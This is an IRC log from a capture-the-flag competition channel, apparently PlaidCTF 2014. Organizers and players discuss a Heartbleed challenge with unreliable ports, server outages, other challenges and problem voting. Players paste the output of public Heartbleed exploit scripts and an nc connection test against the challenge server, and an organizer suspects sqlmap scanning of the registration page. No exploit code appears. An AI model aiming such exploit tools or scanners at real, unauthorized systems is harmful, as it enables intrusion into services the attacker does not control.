(00:44:33) (inter) i think you should +v Tylerni007
(00:44:40) (dwn) nah whatscat is working well
(00:44:48) (justinsteven) including email?
(00:44:54) (justinsteven) :)
(00:44:55) (+tylerni7) justinsteven: what issue?
(00:44:57) (+tylerni7) is it down?
(00:45:00) (justinsteven) not sending email
(00:45:01) (justinsteven) it seems
(00:45:04) (+tylerni7) seems up to me... hmm
(00:45:19) (+tylerni7) could be your mail provider is sad if too many things are sent
(00:45:22) (+tylerni7) did you check spam, etc?
(00:45:24) (justinsteven) that or it's being filtered by anti-spam at two places
(00:45:29) (justinsteven) gmail and somewhere else
(00:45:44) (+tylerni7) maybe
(00:45:50) (dwn) what provider is it not blocked on
(00:45:51) (justinsteven) it was working for a while
(00:46:16) (justinsteven) tylerni7: can I pm? I have an unrelated issue to mention :)
(00:46:18) (+cai_) we'll open a new problem soon
(00:46:19) (+tylerni7) I'll kick postfix
(00:46:21) (+tylerni7) yeah
(00:46:23) (+tylerni7) feel free to pm
(00:46:53) (dwn) did you guys not forsee problems with a chall relying on email being sent
(00:47:07) (+tylerni7) dwn: it doesn't rely on it
(00:47:08) (+cai_) NEW PROBLEM IS OPENED
(00:47:22) (+tylerni7) it's just nice to have
(00:47:56) (+cai_) heartbleeeeed
(00:48:00) (+cai_) let's see how long it takes
(00:48:03) (+cai_) it's a race
(00:48:17) (ryan-c) cai_: for which?
(00:48:19) (+tylerni7) heh
(00:48:21) (+tylerni7) the new problem!
(00:48:22) (+tylerni7) go go go
(00:48:34) (+cai_) ryan-c: new problem is up
(00:48:39) (ryan-c) ah
(00:48:46) (ryan-c) i'm busy with rsa
(00:48:50) (+tylerni7) :)
(00:48:50) (+mserrano) :)
(00:48:53) (+tylerni7) that may take you a while
(00:48:55) (ryan-c) it is bleeding bits
(00:49:06) (+mserrano) heartbleed bleeds flages!
(00:49:48) (ryan-c) tylerma7: will be interested to hear later what solution you guys tested with
(00:50:08) (ryan-c) i suspect there's only one reasonable way to do it
(00:50:13) (cychao) are misc250 alive?
(00:50:33) (tylerma7) sure
(00:50:47) (tylerma7) but you first
(00:50:58) (ImtheMuscleTyler) im the real Tyler!!
(00:51:07) (ImtheMuscleTyler) im the muscle one!
(00:51:22) (+cai_) heartbleed is down
(00:51:23) (+cai_) will be up soon
(00:51:38) (+houqp) cychao: yes
(00:51:59) (ImtheMuscleTyler) booooh!!!1
(00:52:25) (tylerma7) whats up with the server guys?
(00:52:32) (ImtheMuscleTyler) WE need this misc10 to win this CTF!!!
(00:52:42) (ImtheMuscleTyler) give them up!!1
(00:53:11) (+cai_) it'll be back soon, sorry
(00:53:30) (mrsmith67) heartbleed down?
(00:53:32) (+cai_) yep
(00:55:11) jOin: (abc) (7506549f@gateway/web/freenode/ip.117.6.84.159)
(00:55:57) qUit: ([CISSP]HoLyVieR) (
[email protected]) Read error: Connection reset by peer
(00:56:49) (ImtheMuscleTyler) if you wanna have any question ask Tyler007
(00:57:01) (ImtheMuscleTyler) here is the best!
(00:57:07) (+tylerni7) tomcr00se: nice
(00:57:09) (tomcr00se) woot
(00:57:15) (+cai_) tomcr00se: nice
(00:57:19) +tylerni7 goes to bed
(00:57:20) (+tylerni7) later guys
(00:57:32) (inter) tylerni7 nooooo
(00:57:33) (inter) dont die
(00:57:36) (+cai_) chronosphere is charged
(00:57:39) (inter) stay alive
(00:57:39) (ImtheMuscleTyler) inter
(00:57:40) (+cai_) vote vote vote
(00:57:41) (tylerma7) tyler, my friend
(00:57:44) (ImtheMuscleTyler) im the Tyler..
(00:57:57) (inter) tylerma LOL
(00:57:59) (inter) god
(00:58:09) qUit: (juan_) (~jescobar@unaffiliated/jescobar) Quit: Leaving
(00:58:18) (Tylerni007) stop trying to steal my id
(00:58:31) jOin: (shortkidd) (60279873@gateway/web/freenode/ip.96.39.152.115)
(00:59:02) jOin: (pctf527) (46b9d762@gateway/web/freenode/ip.70.185.215.98)
(00:59:22) (+cai_) reekee is opened
(00:59:25) (+cai_) heartbleed is checked
(00:59:28) (+cai_) sovled*
(00:59:30) (+cai_) solved*
(00:59:48) (virodoran) how is it solved if the server is down? :o
(00:59:53) (+mserrano) it's not
(00:59:54) (+mserrano) it's up
(01:00:14) (+cai_) also, the timer halves when a team second/third blood the problem
(01:00:51) qUit: (mekanismen) (mekanismen@unaffiliated/mekanismen) Ping timeout: 252 seconds
(01:00:59) (virodoran) oh, different ports now, I see
(01:01:12) (virodoran) I was wondering why it was refusing connection, lol
(01:01:15) (mrsmith67) how can heartbleed be solved if its down?
(01:01:30) (ImtheMuscleTyler) lol
(01:01:39) (ImtheMuscleTyler) the whole site is down
(01:01:45) (ImtheMuscleTyler) for more than hours...
(01:02:23) (spq) i cant connect to 54.198.183.100 10000 or any port above
(01:02:24) (tomcr00se) where is reekee?
(01:02:34) (+mserrano) tomcr00se: click on the ball in the middle of the numbers
(01:02:37) (+mserrano) to switch to the other board
(01:02:38) (Nanomebia) heartbleed still broken?
(01:02:40) (+mserrano) where reekee lives
(01:02:47) (+cai_) heartbleed works
(01:03:00) (inter) how doyou spell tom crus
(01:03:03) (inter) cruz?
(01:03:04) (n00b13) lol
(01:03:07) (inter) like the cool mexican name?
(01:03:09) (inter) tom cruz
(01:03:17) jOin: (oldtopman) (~oldtopman@unaffiliated/oldtopman)
(01:03:24) (inter) shit
(01:03:26) (inter) thats actually
(01:03:27) (+cai_) heartbleed's description changed. check if you haven't
(01:03:27) (inter) a sick name
(01:03:30) (inter) tom cruz
(01:04:05) (+cai_) 40 votes so far
(01:04:28) qUit: (n00b13) (~n00b13@unaffiliated/nitsua)
(01:04:55) qUit: (merrin) (
[email protected]) Read error: Connection reset by peer
(01:04:55) (spq) cai_: so we should be able to see something via https://54.198.183.100:10000/ =?
(01:04:57) (spq) -=
(01:04:58) (RedRover) anyone else working on reverse 200?
(01:05:04) (zardus) CAT DOWN CAT DOWN
(01:05:10) (zardus) (right?)
(01:05:11) (RedRover) i feel like it's being neglected
(01:05:28) (+cai_) spq: look at the title :p
(01:05:31) (+cai_) should be trivial
(01:06:01) qUit: (merrin_) (
[email protected]) Read error: Connection reset by peer
(01:06:11) (spq) cai_: well, i nc -vvv 54.198.183.100 10914
(01:06:12) (spq) nc: connect to 54.198.183.100 port 10914 (tcp) failed: Connection refused
(01:06:19) (+cai_) try other ports
(01:06:32) (tylerma7) vote for 6, gamble that shit
(01:07:07) (zardus) tylerni7: mserrano: cai_: whatscat down?
(01:07:26) (spq) cai_: tried other ports - have a heartbleed exploit and it does not work against your machine, is it correct openssl or just fake heartbleed?
(01:07:49) (rray) whatscat down?
(01:07:57) qUit: (Frisk0) (
[email protected]) Read error: Connection reset by peer
(01:08:10) (+cai_) spq: it works (and it's real openssl)
(01:08:24) (+mserrano) zardus: rray: will check
(01:08:37) (warrick) mserrano: down for me too
(01:08:57) (Nanomebia) cai_: i'm also unable to connect to anything 10000 through 11000
(01:09:58) (+cai_) Nanomebia: i just tested and it still works
(01:10:03) (+cai_) just try more ports in that range
(01:10:10) (Nanomebia) weird
(01:10:19) (+cai_) the voting is ending soon
(01:10:24) (+cai_) so far 70 votes :)
(01:10:54) (virodoran) yeah, I'm able to connect to random ports for a few seconds before they refuse connections
(01:10:59) (virodoran) then eventually they come back up again
(01:11:14) (+cai_) virodoran: gotta do useful stuff when you get the connection :)
(01:11:25) (+cai_) chance card.. but no luck
(01:12:13) (+mserrano) warrick: rray zardus: restarted all teh stuff I could find
(01:12:24) (+mserrano) warrick: rray zardus: anything more will need to wait for Tylerni007
(01:12:25) (+mserrano) er
(01:12:28) (+mserrano) tylerni7*
(01:12:33) (warrick) mserrano: much obliged
(01:12:40) (rray) mserrano: works now
(01:12:43) (+mserrano) thanks
(01:12:45) (+mserrano) cool
(01:12:55) +mserrano knows like nothing about that problem
(01:13:04) (rray) ...down again
(01:13:07) (inter) mserrano where is my cookie
(01:13:19) (+mserrano) rray: looks up from here
(01:13:26) (warrick) down for me too
(01:13:33) (+cai_) you guys have 2 minutes to roll
(01:13:38) (zardus) mserrano: appears that it's down again
(01:13:48) (+mserrano) are you looking at ipv4 or ipv6
(01:13:51) (+cai_) (you can't land on chance card twice, btw)
(01:13:52) (+mserrano) I can talk to it fine on ipv4
(01:13:55) (zardus) mserrano: the frontend is up, the backend seems screwed
(01:13:58) (+mserrano) oh
(01:13:59) (+mserrano) bleh
(01:14:09) (+mserrano) I think it is currently resetting?
(01:14:09) (+mserrano) idk
(01:14:48) (tylerma7) vote 5
(01:14:55) (warrick) did you try turning it off and on again? :}
(01:14:58) jOin: (F___) (5f1dfc82@gateway/web/freenode/ip.95.29.252.130)
(01:15:05) (rray) the server pings, the php script is taking too long
(01:15:12) (+mserrano) hm
(01:15:17) (+mserrano) the users table appears fucked
(01:15:21) (rray) nice
(01:15:32) (+cai_) reversing 250 is opened
(01:15:38) (Anyny0) 404
(01:16:02) (inter) what if i had epilepsy
(01:16:03) qUit: (F___) (5f1dfc82@gateway/web/freenode/ip.95.29.252.130) Client Quit
(01:16:06) (zardus) mserrano: is that something that needs to wait for tylerni7?
(01:16:11) (inter) and reekee gave me shocks
(01:16:12) (XPenguin) guys, if I understood correctly, I can post the flag only for current task? I'm late due to timezone =)
(01:16:22) (Anyny0) There is a warning for epilepsy inter
(01:16:25) (+cai_) the file is not there
(01:16:27) (inter) i could potentially recieve brain damage :/
(01:16:28) (+cai_) we will upload
(01:16:42) (zardus) XPenguin: yeah, it's a bummer :-(
(01:16:42) (+cai_) XPenguin: no, you can submit any flags you found
(01:16:44) (+cai_) at any given time
(01:16:47) (zardus) :-)
(01:16:47) (+frozencemetery) we posted an epilepsy warning, inter
(01:16:58) (XPenguin) cai_: thanks)
(01:17:25) (+cai_) the file is there now Anyny0
(01:17:43) (+mserrano) zardus: I a... not sure, but I suspect yes
(01:17:45) (+mserrano) am*
(01:17:47) qUit: (Anyny0) (6babd56d@gateway/web/cgi-irc/kiwiirc.com/ip.107.171.213.109) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
(01:18:12) jOin: (thisnicknameisav) (7b748d38@gateway/web/freenode/ip.123.116.141.56)
(01:19:05) (warrick) mserrano: ;_;
(01:19:25) (+cai_) i'm going to sleep now.. see you guys later
(01:19:28) (+cai_) gl
(01:19:37) jOin: (imo) (3d7ebfc3@gateway/web/freenode/ip.61.126.191.195)
(01:19:54) qUit: (rvpersie) (
[email protected]) Remote host closed the connection
(01:20:01) nIck: (imo) is now known as (Guest95043)
(01:20:18) (inter) the mods
(01:20:24) (inter) are all falling into the darkness
(01:20:27) (asmoday) well I was tired until that mymeme page...now its a party
(01:20:59) (shortkidd) omg
(01:21:05) qUit: (chandler_) (dce9b865@gateway/web/freenode/ip.220.233.184.101) Ping timeout: 240 seconds
(01:21:06) (shortkidd) I was wondering why heartbleed wasn't working
(01:21:13) (shortkidd) I forgot to enter the -p to enable port ><
(01:21:16) (asmoday) lightswitch rave...thump thump thump..thump..thump...the cheat is grounded
(01:22:06) (reanimus) heartbleed constantly disconnects me ;;
(01:22:53) (+clockish) reanimus: try a different port
(01:22:56) jOin: (mekanismen) (~mek@unaffiliated/mekanismen)
(01:25:57) (reanimus) Sending heartbeat request...
(01:25:57) (reanimus) Unexpected EOF receiving record header - server closed connection
(01:25:58) (reanimus) No heartbeat response received, server likely not vulnerable
(01:26:02) (reanimus) hmmmmm
(01:26:18) (mrsmith67) reanimus thats what im geting to
(01:26:44) (reanimus) Tried a C implementation, it also pukes on it
(01:27:16) (x56) same, over many ports
(01:27:36) (shortkidd) python one isn't working
(01:27:54) (inter) python one is up
(01:28:01) (inter) you mean pwn375
(01:28:07) (shortkidd) no
(01:28:10) (shortkidd) heartbleed through python
(01:28:23) (sdfsfdsfd) tried it in python 2.7 and 3.3. nada
(01:28:37) (Nanomebia) woo finally got heartbleed to go
(01:28:46) (sdfsfdsfd) how?
(01:29:00) (Nanomebia) magic :(
(01:31:29) (poppopret) i see a bunch of open ports from 10000-11000 but don't know what to do with them lol
(01:31:45) (reanimus) bleed it out
(01:33:10) (shortkidd) I can get a connection but can't actually do the heartbleed for some reason...
(01:33:44) (RedRover) where are you guys getting the code for the heartbleed exploit?
(01:34:13) (reanimus) The python one is widespread
(01:34:26) (reanimus) I tried one someone sent in to Full Disclosure
(01:34:35) jOin: (epochtato) (~epochfail@ec2-54-252-29-104.ap-southeast-2.compute.amazonaws.com)
(01:34:38) (reanimus) neither is having much luck
(01:35:07) (asmoday) not sure what to do with the heartbleed data....is it supposed to say flag?
(01:35:14) jOin: (MavJS) (~maverick@fedora/MavJS)
(01:36:03) (pipecork) reanimus: same
(01:36:11) (Tylerni007) chronosphere is recharging.
(01:36:27) (epochtato) why can't we register with a purely numeric username ;_;
(01:37:32) (sibios) blegh, stupid disconnects :(
(01:39:31) (+cai_) i'm surprised that only 5 teams have solved heartbleed
(01:39:47) (asmoday) not sure what to do with the data
(01:39:52) (reanimus) it always terminates after sending the heartbeat for me ;;
(01:40:06) (shortkidd) same her
(01:40:09) (shortkidd) here*
(01:40:24) (+cai_) try better exploit!
(01:40:29) (reanimus) ;;;;;
(01:40:57) (+cai_) (like mine works consistently)
(01:42:28) (Nanomebia) cai_: sexybackground() i beg to disagree ;_;
(01:43:49) (shortkidd) areyou using the metasploit one, cai?
(01:43:54) (+cai_) nah
(01:44:29) (+cai_) it's a custom one, but shouldn't be too different from others?
(01:44:47) (k00mi) that python thingy gives me a dump
(01:45:48) jOin: (RPISEC) (807163f2@gateway/web/cgi-irc/kiwiirc.com/ip.128.113.99.242)
(01:47:12) jOin: (Anyny0) (6babd56d@gateway/web/cgi-irc/kiwiirc.com/ip.107.171.213.109)
(01:49:00) (Tylerni007) heartbeat down
(01:49:02) (Tylerni007) down
(01:49:03) (Tylerni007) down
(01:50:18) (Anyny0) x) Sweet
(01:50:34) (inter) heartbleed is down
(01:50:35) (inter) all ports
(01:51:07) (+cai_) lies
(01:51:13) (k00mi) that's a lie
(01:51:40) (inter) i was pissed off so i wrote a bruteforce to try from 10000 - 10100
(01:51:43) (inter) and they all dont work
(01:51:51) (inter) i didnt want to put too much load on the server so i only tried 100
(01:52:02) (x56) I just tried 10070
(01:52:04) (x56) it wirks
(01:52:08) (x56) *works
(01:52:09) (inter) wtf
(01:52:11) (inter) ill try
(01:52:18) (inter) lies
(01:52:29) (x56) ...
(01:52:33) (x56) it's sporadic
(01:52:36) (x56) keep trying
(01:52:41) (+clockish) e.g. 10150 works for me
(01:52:47) (+frozencemetery) if the heartbleed port you get doesn't work, try a diff one
(01:52:54) (+cai_) i tried 10330 and it worked
(01:53:09) (+clockish) the problem is that people can do and things and take it down semi-pemanently
(01:53:18) (+clockish) oh and also it's not a forking or threaded server
(01:53:29) (sibios) with the C exploit? or the python exploit(s)?
(01:53:31) (+clockish) i... fail at making problems.
(01:53:43) (+clockish) cai_: what happens when the scoreboard wraps?
(01:53:53) (+cai_) hmm?
(01:53:57) (+cai_) the gameboard?
(01:54:01) (+clockish) like, it's not possible to land on an already opened problem right?
(01:54:07) (inter) clockish: is heartbleed yours too
(01:54:08) (+cai_) right
(01:54:13) (+clockish) yeah cool
(01:54:23) (inter) your pyjail HOMIE
(01:54:23) (+clockish) I assumed you'd got it right, just wanted to check ;)
(01:54:33) (+clockish) inter: yeah, those be mine
(01:54:42) (inter) my teammate wants to kill everyone around him
(01:54:48) (inter) from frustration rofl
(01:54:58) (Tylerni007) tylerthecreatorisgone
(01:55:03) (asmoday) heartbleed connection refused
(01:55:12) (+clockish) asmoday: try a different port.
(01:55:24) (asmoday) 10000-11111
(01:55:27) (+clockish) it is expected that some will not always work
(01:56:07) (dwn) host isn't responding on any for me rip
(01:56:21) (dwn) oh rofl i wonder if this uni is filtering the exploit traffic
(01:57:18) (Anyny0) x)
(01:57:26) (asmoday) EOF drop drop
(01:57:39) (pipecork) is 0xffa supposed to be Final Fantasy 10?
(01:59:00) (+clockish) nah man
(01:59:06) (hellok_) for hb: Error opening ''
(01:59:07) (hellok_) 140402478491304:error:02001002:system library:fopen:No such file or directory:bss_file.c:169:fopen('','r')
(01:59:07) (hellok_) 140402478491304:error:2006D080:BIO routines:BIO_new_file:no such file:bss_file.c:172:
(01:59:12) (+clockish) pipecork: 0xf0f + 0xeb
(01:59:13) jOin: (aloha_) (76468068@gateway/web/freenode/ip.118.70.128.104)
(01:59:37) (+clockish) two different teams joined, those are their abbrvs
(01:59:39) (RedRover) ffx was the shit
(01:59:51) (RedRover) any tips/pointers for web 150
(01:59:56) (RedRover) like a general anything
(01:59:58) (tylerma7) good night
(01:59:59) (pipecork) clockish: ah rad
(02:00:06) (RedRover) night
(02:00:39) qUit: (Anyny0) (6babd56d@gateway/web/cgi-irc/kiwiirc.com/ip.107.171.213.109) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
(02:00:39) (asmoday) NO heartbeat geez cant even get the easy ones
(02:02:05) qUit: ([SF]testdata) (75c1a076@gateway/web/freenode/ip.117.193.160.118) Ping timeout: 240 seconds
(02:04:10) (RedRover) Im so close on g++
(02:04:19) (RedRover) i got stuck though, it's too late
(02:04:52) (dwn) heartbeat being denied by some team with a script
(02:04:55) (dwn) probs
(02:05:13) (aloha_) any hint for crypto20 ?
(02:05:37) (dwn) yes
(02:05:40) (dwn) it is worth 20 points
(02:05:43) (shortkidd) thanks dn
(02:05:44) (shortkidd) dwn
(02:05:48) (inter) yes
(02:05:52) (dwn) np
(02:05:54) (inter) its a crypto challenge
(02:05:59) (Yen1) man, I could do web300 if it didn't keep going down :/
(02:06:30) (+mserrano) Yen1: =\
(02:06:36) (+mserrano) sorry
(02:06:40) (+mserrano) people are like spamming it
(02:06:42) (inter) mserrano: are you ever going to sleep tonight :o
(02:06:47) (Yen1) to be fair, I have the wrong solution, which works, but it's slow
(02:06:48) (dwn) i could do something of some server's dns cache wasn't ignoring my record ttls
(02:06:58) (warrick) mserrano: down for me too, could you give it a nudge please :]
(02:07:05) (Yen1) so it's kinda my fault too. I'm probably one of those spammers :/
(02:07:08) qUit: (nullProtectorate) (
[email protected]) Ping timeout: 276 seconds
(02:07:12) (+clockish) is this heartbleed?
(02:07:17) (Yen1) well, depends on what rates you mean by spamming
(02:07:18) +mserrano nudging it
(02:07:20) (+mserrano) clockish: whatscat
(02:07:25) (+clockish) oh ok good
(02:07:30) (+mserrano) and yes I will sleep
(02:07:33) (+clockish) you fix it :P
(02:07:35) (acez) something happened to nightmares ?
(02:08:00) (inter) clockish is in charge of nightmares
(02:08:05) (inter) you can slap him couple times for it
(02:08:13) (+clockish) checking nightmares
(02:08:15) (acez) 1 2
(02:08:36) (+clockish) nightmares is working
(02:08:38) jOin: (tokki) (d9a5709e@gateway/web/freenode/ip.217.165.112.158)
(02:08:51) (+mserrano) ok
(02:08:57) (+mserrano) I think people were sqlmap'ing registration
(02:09:00) (+mserrano) because there were like
(02:09:03) (+mserrano) thousands of users
(02:09:15) (+mserrano) But whatscat has been nuged
(02:09:17) (+mserrano) nudged*
(02:09:22) (iago-x86) the heartbleed level's ports seem to all be closed..
(02:09:24) (+mserrano) by which I mean reset to its base state, hopefully
(02:09:31) (inter) iago-x86 ikr? LOL
(02:09:32) (+mserrano) clockish: ^^
(02:09:33) (acez) clockish: hmm it's not responding to me
(02:09:44) (+mserrano) man computers are hard
(02:09:53) (acez) times out
(02:10:14) (iago-x86) hmm, browser negotiates SSL, then fails
(02:10:17) (iago-x86) Maybe I'm crazy :)
(02:10:26) (+clockish) heartbleed comes back on it's own every 30 sec
(02:11:15) (inter) you actually automated that?
(02:11:22) (inter) and you didnt make pyjail easier? :(
(02:11:44) (asmoday) haha opposite of what the rest of us have been doing since it became popular this week
(02:11:49) (+clockish) inter: it's 3 lines of bash to fix the mistake that openssl s_client is not a forking or threaded server :P
(02:12:26) (abcert) hint for web 150???
(02:12:39) (iago-x86) abcert: It's vulnerable. :)
(02:12:52) (namrog84) am i supposed to brute force the secret, or is there another way to solve that? for 150
(02:12:55) (namrog84) to discover it
(02:12:59) (iago-x86) And conveniently, I wrote the best tool for abusing said vulnerability. :)
(02:13:09) (abcert) iago-x86, :D, it is not a hint
(02:13:28) (+clockish) namrog84: brute force will not work
(02:13:37) (+clockish) unless you have all the computers and all of the time
(02:13:44) (namrog84) i mean im at the admin page, examining various things
(02:13:46) (iago-x86) Also bandwidth
(02:14:09) (namrog84) i didnt mean brute forcing the website, i can do it local to solve the salt, is what i meant
(02:14:29) (+clockish) and I mean that it's not actually possible to solve for that salt.
(02:14:45) (namrog84) i was trying to do that, and also try another attack vector
(02:14:49) (namrog84) but ill drop the brute then
(02:15:03) (namrog84) try and figure out what im doing wrong
(02:15:10) (mrsmith67) can anyone help me on heartbleed?
(02:15:19) (mrsmith67) none of the poc's work :(
(02:15:22) (mrsmith67) im new to ctfs
(02:15:27) (mrsmith67) but cant even land a 10ptr :(
(02:15:40) (ryan-c) arg, stupid rsa
(02:15:54) (namrog84) clockish, am i supposed to figure out the salt, or just bypass that aspect completely ?
(02:15:58) (iago-x86) mrsmith67: Do your best, then read writeups afterwards. :)
(02:15:58) (asmoday) I am not new to CTFS and I am stuck on too many
(02:16:02) (asmoday) my team sucks ha
(02:16:22) (asmoday) this heartbleed is not very bloody
(02:16:29) (+clockish) asmoday: correct
(02:16:32) (+clockish) we bleed flags
(02:16:34) (+clockish) not blood
(02:16:56) (asmoday) TTLS?
(02:16:58) (+clockish) namrog84: well, if you thing you can't get something, then you should assume the flag is somewhere else :)
(02:18:38) (+frozencemetery) your princess is in another castle etc.
(02:19:21) (mrsmith67) im just looking for right direction, thats all
(02:19:28) (mrsmith67) none of the scripts i have for heartbleed are working :(
(02:19:54) (asmoday) me either
(02:20:11) (asmoday) even resorted to metasploit which I know 10000% works as I have used it on my customers
(02:20:32) (iago-x86) That's a lot of working
(02:20:51) (x7r0n) any ops
(02:20:52) (x7r0n) ?
(02:21:14) (iago-x86) No ops, according to /names
(02:21:23) (iago-x86) Unless you mean opcodes, I have plenty of those
(02:21:44) (abuss) can we get more workers on reekee? :)
(02:21:51) (abuss) so slow :(
(02:21:52) (foundation) damnit PPP, i tought to myself "this heartbleed thingie is becoming really anoying to watch so i'll play CTF for a while while everybody shuts up about it" , but noooooooo
(02:22:12) (+cai_) lol
(02:22:27) qUit: (Guest95043) (3d7ebfc3@gateway/web/freenode/ip.61.126.191.195) Quit: Page closed
(02:22:28) (asmoday) this ctf heartbleed is better patched
(02:22:35) (+cai_) gotta make sure everyone knows how that shit works man
(02:22:45) (asmoday) not very well in this instance
(02:23:18) (iago-x86) I said "If I was running a CTF, I'd be scrambling to include heartbleed"
(02:23:25) (iago-x86) Called it! :)
(02:23:28) (+cai_) :p
(02:23:51) (foundation) **[Dsigh
(02:23:54) jOin: (mathiasbynens) (sid2247@gateway/web/irccloud.com/x-bahgxrmimlqnassq)
(02:23:58) (abuss) scrambled, indeed
(02:24:03) (iago-x86) [2014-04-11 12:17:37] < iago-x86> If I was running the CTF, I'd be quickly adding a heartbleed level :)
(02:24:15) (iago-x86) 12 hours ago
(02:24:49) (asmoday) No heartbeat response received, server likely not vulnerable
(02:24:56) (iago-x86) Or, more likely, PPP knew about heartbleed before and had always intended to include it as a 500pt level
(02:25:01) (asmoday) socket.error: [Errno 111] Connection refused
(02:25:02) (iago-x86) Then some asshole leaked it and it became 20pts
(02:25:08) (foundation) well, we all know you are working for google , so ...
(02:25:16) (iago-x86) shh ;)
(02:25:25) iago-x86 didn't know anything till it was public
(02:25:36) (iago-x86) Which is for the best, I can't keep a secret :)
(02:25:45) (foundation) :)
(02:25:50) (asmoday) its been known since november
(02:26:21) (iago-x86) Whoever chose the background for MyMeme.. I hate you. :)
(02:26:32) (+mserrano) we had to include heartbleed
(02:26:32) (+cai_) asmoday: maybe you should try to construct an attack instead of using public poc (or find better poc)
(02:26:37) (+mserrano) it was released this week
(02:26:38) (+mserrano) I mean
(02:26:39) (+mserrano) come on
(02:26:56) (x7r0n) geohot would get more views :-D
(02:27:11) (iago-x86) I loved the reference to geohot's rapping
(02:27:27) (foundation) what's mymeme?
(02:27:35) (iago-x86) It's a Web level
(02:28:10) jOin: (bob__) (1817f0b6@gateway/web/freenode/ip.24.23.240.182)
(02:28:34) nIck: (bob__) is now known as (bobsteam)
(02:28:53) (marcoscars02) tor domain off?
(02:30:25) (iago-x86) Just so you all know, I still have nightmares about cnot
(02:30:53) (+frozencemetery) <3 wren
(02:30:57) (arthurdent) i can't seem to connect to any of these heartbleed ports
(02:31:09) (iago-x86) arthurdent: Just wait a minute and try again
(02:31:13) (iago-x86) Apparently the service is sketch :)
(02:31:21) (inter) frozencemetery what problem are you in charge of :o
(02:31:28) (+frozencemetery) it's heartbleed; it's not allow to be legit
(02:31:42) (+frozencemetery) inter: ah, but that would be telling!
(02:31:49) (+frozencemetery) where's the fun in that?
(02:32:28) (inter) because i would like to accuse you
(02:32:34) (inter) of all the problems that is killing my brain cells
(02:32:43) (inter) if you dont tell me them :/
(02:32:44) (inter) jk
(02:34:05) (+mserrano) inter: which problems are killing your brain cells
(02:34:48) (inter) rsa homie
(02:34:50) (zardus) mserrano: web200 is giving a 403 :-(
(02:35:15) (+mserrano) inter: tylerni7 wrote it; I "tested" it
(02:35:40) (inter) how did your "test" go?
(02:36:06) (tomcr00se) omg missed reekeee by 4 minutes :/
(02:36:16) (tomcr00se) dumbest typo
(02:36:19) (+mserrano) inter: I got the flag.
(02:36:20) (+clockish) tomcr00se: hack faster
(02:36:31) (abuss) can I PM someone about reeeekeee?
(02:36:37) (x7r0n) how do i vote..i select the number and then ?
(02:36:38) (+mserrano) zardus: which web 200
(02:36:48) (shortkidd) Just keep it selected x7r0n
(02:37:22) jOin: (insanitybit) (969cdb9b@gateway/web/freenode/ip.150.156.219.155)
(02:37:23) (x7r0n) like i want it for forensics100 shortkid
(02:37:37) (x7r0n) so i selected the number and then ?
(02:37:38) (insanitybit) YOOOOOOOOOOOOOOOOOOOOO
(02:37:51) (+mserrano) also, just saw samurai solved tiffany
(02:38:00) (+mserrano) ebeip90: bool101: hope you liked it :P
(02:38:03) (bobsteam) anyone finished with mtpox up for a question/pm?
(02:38:13) (insanitybit) Vote 3 for pwnables
(02:38:16) (inter) tomcr00se: the one man army is real
(02:38:26) (x7r0n) discharge in 11 minutes..please vote for forensics100
(02:38:32) (synthverity) I second the pwnables notion
(02:38:36) (inter) are you from Valkyrie
(02:38:37) (inter) ?
(02:38:39) (insanitybit) fuck foensics what
(02:38:54) (x7r0n) u dont fuck..just vote :-D
(02:39:01) (insanitybit) :O
(02:39:18) (insanitybit) pwnables ftw
(02:39:29) (tomcr00se) moar pwnables yes yes yes
(02:39:32) (synthverity) There is no forensics 100
(02:39:33) (insanitybit) ^^^^^^
(02:39:42) (synthverity) There is a 350
(02:40:13) (x7r0n) the one before reversing 200
(02:40:21) (+mserrano) zardus: looks ok to me
(02:40:22) jOin: (zzoru) (8ff8f941@gateway/web/freenode/ip.143.248.249.65)
(02:40:23) (+clockish) I will laugh my ass off if for350 gets picked
(02:40:28) (insanitybit) are you on the wrong page
(02:40:36) (+mserrano) lol
(02:40:39) (insanitybit) ill give you 350 to smd damn wrecked slammed
(02:40:39) (insanitybit) irl
(02:40:40) (insanitybit) x_x
(02:40:40) +mserrano == clockish
(02:40:45) (+clockish) EVERYBODY PICK FOR350
(02:40:46) (+mserrano) it will be hilarious if that is the next problem opened
(02:41:00) (x7r0n) opp to powerups
(02:41:05) (+mserrano) I really
(02:41:07) (+mserrano) don't know
(02:41:10) (insanitybit) noooo
(02:41:13) (+mserrano) why you guys skipped over all the 200/100 pointers
(02:41:13) (insanitybit) im sitting here
(02:41:15) (insanitybit) waiting for pwns
(02:41:21) (insanitybit) ur kilin me
(02:41:22) (insanitybit) :x
(02:42:04) (x7r0n) y nt all 100
(02:42:10) (insanitybit) 100s every run
(02:42:12) (insanitybit) this is the run
(02:43:09) (insanitybit) how many votes does a person get even ???????? !!!!!!!
(02:43:29) jOin: (l0ve) (72560111@gateway/web/freenode/ip.114.86.1.17)
(02:43:34) (+mserrano) one per team I believe
(02:43:42) (+mserrano) per voting period, obviously
(02:44:02) (+clockish) insanitybit: NO, THE FASTER AND HARDER YOU CLICK THE MORE AND BETTER YOUR VOTES
(02:44:14) (+clockish) EVERYONE CLICK FOR350 REALLY HARD PLZ
(02:44:21) (insanitybit) I BROKE MY MOUSE CUZ IM CLICKING TOO DAMN HARD
(02:44:28) (insanitybit) EVERYONE CLICK FOR PWNABLES DONT LISTEN TO CLOCKISH
(02:44:31) (+clockish) insanitybit: BREAK YOUR TABLE TOO
(02:44:34) (insanitybit) HE HAS A + IN HIS NAME IM FOR THE PEOPLE
(02:44:44) (insanitybit) WHO ARE THESE '+' USERS
(02:44:44) (insanitybit) EVEN
(02:44:48) (insanitybit) PWNABLES FOR THE PEOPLE
(02:44:53) (synthverity) Viva la revolution
(02:45:04) (+clockish) I DON'T KNOW I JUST FOUND THIS CHANNEL AND HAVE BEEN TROLLING IT FOR HOURS
(02:45:06) (shortkidd) It's <+(they're name), duh
(02:45:07) (+frozencemetery) insanitybit: funny, it looks more like you broke your caps lock
(02:45:09) (+clockish) ALSO HOW DO I TURN OFF CAPS LOCK
(02:45:13) (insanitybit) i love when my dree
(02:45:14) (tokki) lol
(02:45:17) (insanitybit) aoeurghaerg
(02:45:19) (insanitybit) WHATS HAPPENED
(02:45:21) (+frozencemetery) clockish: just hold down shift while you type!
(02:45:21) (insanitybit) OH GOD
(02:45:34) (insanitybit) THAT RAVE CHALLENEGE
(02:45:35) (insanitybit) AND THEN THE BEER
(02:45:36) (insanitybit) AND
(02:45:39) (insanitybit) THE +
(02:45:41) (insanitybit) PWNABLES GO
(02:45:53) (synthverity) Go go pwnable rangers!
